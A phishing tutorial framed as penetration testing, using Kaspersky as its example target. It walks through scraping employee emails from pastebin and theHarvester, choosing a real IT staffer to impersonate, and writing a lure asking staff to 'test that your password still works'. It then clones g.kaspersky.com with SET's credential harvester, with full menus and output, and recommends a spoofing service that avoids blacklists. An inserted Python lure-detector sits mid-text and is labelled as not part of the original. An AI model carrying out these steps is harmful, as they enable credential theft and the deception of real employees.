This primer covers sending spoofed emails from an online service with a link to a cloned credential-harvesting site. SET provides a clean, menu-driven interface for website cloning and automates the process. Using sendmail directly is also an option in SET; it requires a single change to the configuration and a mail relay to function correctly.
We will again use the HackerOne directory to identify a company but WILL NOT be sending phishing emails to them. This would be really bad form and potentially illegal. For this, we are going to pick on a known antivirus and security company, Kaspersky. Kaspersky was basically chosen because it is a large enough organization that we should be able to find a decent page to clone, and there should be enough email addresses in the wild to generate a list from a few different places.
Email Target List
The heart of any successful phishing campaign is the list of targets. Normally we would use recon-ng to build this list, but in this tutorial, we will do a few manual processes to show other methods. These can absolutely be automated, but for now let's do it the hard way.
From pastebin.com, I searched for “@kaspersky.com -license”. This is because the top pastes were all license key dumps, and I was specifically looking for emails.
I threw the entire raw contents of the data into a text file. Let's look in a few other places. We have already used theHarvester to find email addresses in the recon-ng tutorial, so let's also use it here and put the results in the same text file.
root@kali:~/Desktop# theharvester -d kaspersky.com -b all
We need to quickly pull out and de-duplicate the email addresses. This isn’t an issue with theHarvester, but the pastebin data isn’t structured.
root@kali:~/Desktop# grep @kaspersky.com kasperskyRawEmails.txt > kasperskyEmail.txt
root@kali:~/Desktop# leafpad kasperskyEmail.txt
root@kali:~/Desktop# sort -d kasperskyEmail.txt > kasperskyEmailSorted.txt
root@kali:~/Desktop# sort -u kasperskyEmailSorted.txt > kasperskyEmail.txt
I used leafpad to clean up a few lines that had extra data. If there were more than a handful, I would have written a sed or awk script to clean it up, but with just a few, it was just as quick to do it manually. I sorted it with the -d option to put them in alphabetical order then -u to get rid of any duplicates. More importantly, by looking at the email addresses, we can easily guess anyone’s email in the company because they follow the email@example.com. A quick LinkedIn search of people who work at Kaspersky would provide us with another list. Personally, I would remove Eugene Kaspersky from the list since he is the founder, but hey, do what you want. In a normal penetration test, most companies would ask to approve the list and remove or add people as they see fit. For reporting reasons, running a wc -l against this list once approved will give you the number of emails. From these three searches, we have 142 unique targets.
While in the list, it is always good to look through and remove any email that is generic or does not direct to an actual person. Examples would be firstname.lastname@example.org or email@example.com. Also and more importantly, remove anything that will get you caught. I hate to say this, but do not attempt to phish spam@ or abuse@ addresses; if it does work, you probably get extra h4x0r cred, though.
Baiting the Hook
To figure out who to spoof, I went on LinkedIn and searched for IT Support in the United States for Kaspersky. I’ve redacted the person’s name, but it is plausible that this person would send out an email about a website, and since the email will be in English, that shouldn’t be a huge red flag. Sending out an email from an employee in the Russian Federation written in English should raise questions. Writing it in English and attempting to emulate a translation from Russian may work, as well.
Next, we need to identify a website to clone. We need a login on this page to spoof, so first we will use fierce to identify potential sub-domains.
root@kali:~/Desktop# fierce -dns kaspersky.com
I looked through the fierce results and settled on https://g.kaspersky.com for the page to be cloned. I like the simple page layout, since there are fewer chances for the clone to go wrong, and based on the title it logs into a support page. VPN and Outlook Web Access (OWA) are normally my favorite pages, but occasionally, the clone needs to be massaged to make it look normal.
Next, let’s work on the Subject and Body of the email message.
Subject: Support Bot Login Page Test
All, We are testing the new login page for support bot at g.kaspersky.com. The old page had some certificate errors that prevented some users from reaching it so please let us know if this is still happening and also test that your password still works before the new systems goes live (http://192.168.2.131/login). Let me know if you have any problems.
Spoofed IT Guy
Reading the email, we need to address a few things. First is the certificate error that we get when going to the real site. This is one of the many reasons why it is important to NOT train your users to click through certificate errors. Also, mixing a little bit of truth in with the lie helps to make it more effective.
Second, ask them to log into the page and contact us if there are any errors. Because we will be using a spoofed email and not a fake email address, this adds a little bit of risk that someone will respond and either confuse the IT staff or alert them to the phishing campaign that is underway. Spend some time thinking and crafting the email message to work for the company you’re testing.
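A defender-side view of the message above, as an added example that is not part of the original tutorial: the lure names g.kaspersky.com in its text but links to a bare IP address over plain HTTP, and a mail filter can flag that mismatch. The message below is an abridged, constructed copy of the page's email; the From address, function names and reason labels are assumptions made for this sketch.

```python
import ipaddress
import re
from email import message_from_string
from urllib.parse import urlsplit

# Constructed sample: the page's lure, abridged, wrapped as an RFC 5322 message.
# The From address is a placeholder and does not come from the page.
SAMPLE = """\
From: Spoofed IT Guy <it.guy@example.com>
Subject: Support Bot Login Page Test

All, We are testing the new login page for support bot at g.kaspersky.com.
Please test that your password still works before the new systems goes
live (http://192.168.2.131/login). Let me know if you have any problems.
"""

URL_RE = re.compile(r"https?://[^\s<>()\"']+", re.I)
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
LOGIN_RE = re.compile(r"log-?in|sign-?in|auth", re.I)


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def lure_indicators(raw_message):
    """Return (url, reasons) pairs for links that look like credential lures."""
    body = message_from_string(raw_message).get_payload()
    # Hostnames the prose mentions, with the URLs themselves blanked out first.
    named = {h.lower() for h in HOST_RE.findall(URL_RE.sub(" ", body))}
    findings = []
    for url in URL_RE.findall(body):
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        reasons = []
        if is_ip_literal(host):
            reasons.append("ip-literal-host")
        if parts.scheme.lower() == "http":
            reasons.append("no-tls")
        if LOGIN_RE.search(parts.path):
            reasons.append("login-path")
        if named and host not in named:
            reasons.append("host-differs-from-text")
        if reasons:
            findings.append((url, reasons))
    return findings
```

Any single reason is weak on its own; the combination of an IP-literal host, a login path and a hostname mismatch is what makes this message stand out.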
We will use SET to clone the website and harvest credentials. The ***** indicates that I’ve redacted the screen text and have only shown the option to choose.
root@kali:/opt/social-engineer-toolkit# setoolkit
*****
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
*****
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
*****
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
set:webattack>3
*****
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.2.131
The address is either for the local host (in this case) or for the external interface of the server that will be hosting the web server. (NOTE: We are currently watching this thread: https://github.com/trustedsec/social-engineer-toolkit/issues/289. If a fix gets posted for the OpenSSL/PEM file issue, we will update this.)
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://g.kaspersky.com/login
[*] Cloning the website: https://g.kaspersky.com/login
[*] This could take a little bit...
Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibility will be affected.
If you wanted to add SSL support to improve the quality of the attack, SET absolutely supports it with a few changes. And https://letsencrypt.org will allow you to get free SSL certificates. I’ve highlighted the differences in the preceding images.
[*] Printing error: zipimporter() argument 1 must be string, not function
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.2.1 - - [27/Apr/2017 16:11:47] "GET / HTTP/1.1" 200 -
Now, we send out bait and see who we can catch.
Set the Hook
We have used a couple of different email spoofing services and have recently settled on Sharpmail.co.uk. They work well, and they don’t get blacklisted in mail servers. It is a paid service, though, if you want premium features such as removing the tag line at the bottom or sending SMS messages. Below is a screen showing how to send messages in Sharpmail; there is an argument to be made that putting a few of the addresses together in the To: line would make it more believable, but for now, they are all in the BCC: line.
Finally, we would send this email out and simply wait to see who got hooked.
SET has a nice live update when credentials are captured and also packages up a report at the end.
From here it would depend on what the client requests. Do you use these credentials to attempt further exploitation or just produce the report? Your testing might be done, or you could have potentially generated a bunch of additional work for yourself.